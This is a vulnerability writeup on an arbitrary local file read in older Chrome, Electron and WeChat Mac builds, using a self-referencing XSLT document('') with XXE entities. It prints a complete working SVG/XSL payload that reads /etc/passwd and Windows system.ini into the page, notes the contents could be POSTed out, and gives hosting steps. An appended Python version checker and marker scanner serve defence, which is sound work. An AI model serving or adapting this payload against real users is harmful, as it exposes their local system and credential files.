Google Chrome Arbitrary File Reading
Vulnerability Principle: Chrome intercepts the first entity declaration that references an external entity. If the document includes itself as an external XML document (via the XSLT document('') reference) and then makes a second entity declaration that references an external entity, and the two references use compatible formats so that no error is raised, the interception is bypassed and local files can be read.
Exploitation Conditions:
Chrome version < 116.0.5845.96
Electron version < 26.1.0
WeChat Mac version < 3.8.5.17
Prerequisite: sandbox mode must be disabled
Reproduction Environment
Payload
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
  <!ENTITY passwd_p "file:///etc/passwd">
  <!ENTITY passwd_c SYSTEM "file:///etc/passwd">
  <!ENTITY sysini_p "file:///c:/windows/system.ini">
  <!ENTITY sysini_c SYSTEM "file:///c:/windows/system.ini">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('')"/>
    <body xmlns="http://www.w3.org/1999/xhtml">
      <div style="display:none">
        <p class="&passwd_p;">&passwd_c;</p>
        <p class="&sysini_p;">&sysini_c;</p>
      </div>
      <div style="width:40rem" id="r" />
      <script>
        document.querySelector('#r').innerHTML = `
        remote web url: <textarea style="width:100%;height:1rem">${location.href}</textarea><br/><br/>`;
        document.querySelectorAll('p').forEach(p => {
          //You can send p.innerHTML by POST.
          document.querySelector('#r').innerHTML += `
          local file path: <textarea style="width:100%;height:1rem">${ p.className }</textarea><br/>
          local file content:<textarea style="width:100%;height:6rem">${ p.innerHTML }</textarea><br/><br/>`;
        });
      </script>
    </body>
  </xsl:template>
</xsl:stylesheet>
On the attacking machine, start the Apache service and save the payload as d.svg; then open the page in the browser.
systemctl start apache2
The local system.ini file is read successfully. Through this vulnerability, other sensitive files on Windows can be read as well, and XXE code can be executed.
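As an added example from the defensive side (not part of the original writeup), the following Python checks two things a responder would want: whether an installed version falls below the fixed versions listed above, and whether an XML/SVG file carries the three markers of this technique (a SYSTEM entity pointing at a local file, an xml-stylesheet PI applying XSL, and a document('') self-reference). The thresholds come from the page; the samples, product keys and function names are constructed assumptions.

```python
import re
from typing import List, Tuple

# Fixed versions as listed in the writeup; a version is affected when strictly lower.
FIXED_VERSIONS = {
    "chrome": "116.0.5845.96",
    "electron": "26.1.0",
    "wechat-mac": "3.8.5.17",
}

# Markers of the self-referencing XSLT/XXE pattern shown in the writeup.
ENTITY_SYSTEM_RE = re.compile(r"<!ENTITY\s+\w+\s+SYSTEM\s+['\"]([^'\"]+)['\"]", re.I)
STYLESHEET_PI_RE = re.compile(r"<\?xml-stylesheet[^>]*type=['\"]text/xsl['\"]", re.I)
SELF_DOCUMENT_RE = re.compile(r"document\(\s*['\"]{2}\s*\)")  # document('') or document("")

def parse_version(v: str) -> Tuple[int, ...]:
    return tuple(int(x) for x in v.split("."))

def is_affected(product: str, version: str) -> bool:
    """True when the installed version is below the first fixed version from the writeup."""
    return parse_version(version) < parse_version(FIXED_VERSIONS[product])

def scan_xml(text: str) -> List[str]:
    """Return findings for one document; an empty list means no marker was seen."""
    findings = []
    local = [u for u in ENTITY_SYSTEM_RE.findall(text) if u.lower().startswith("file:")]
    if local:
        findings.append("external SYSTEM entity to local file: " + ", ".join(local))
    if STYLESHEET_PI_RE.search(text):
        findings.append("xml-stylesheet PI applies an XSL transform")
    if SELF_DOCUMENT_RE.search(text):
        findings.append("XSLT document('') re-reads the document itself")
    if len(findings) == 3:
        findings.append("HIGH: all three markers present, matches the self-referencing XXE pattern")
    return findings

# Constructed samples: one mirrors the structure of the page's payload, one is a plain SVG.
SAMPLE_SUSPICIOUS = """<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [ <!ENTITY f SYSTEM "file:///etc/passwd"> ]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"><xsl:copy-of select="document('')"/></xsl:template>
</xsl:stylesheet>"""
SAMPLE_BENIGN = """<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>"""

if __name__ == "__main__":
    for name, doc in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, scan_xml(doc) or ["no markers"])
    print("chrome 115.0.5790.170 affected:", is_affected("chrome", "115.0.5790.170"))
```

The scanner is a triage aid for files served or uploaded as SVG/XML; a document that raises only one marker may be legitimate XSLT, while all three together warrant a closer look.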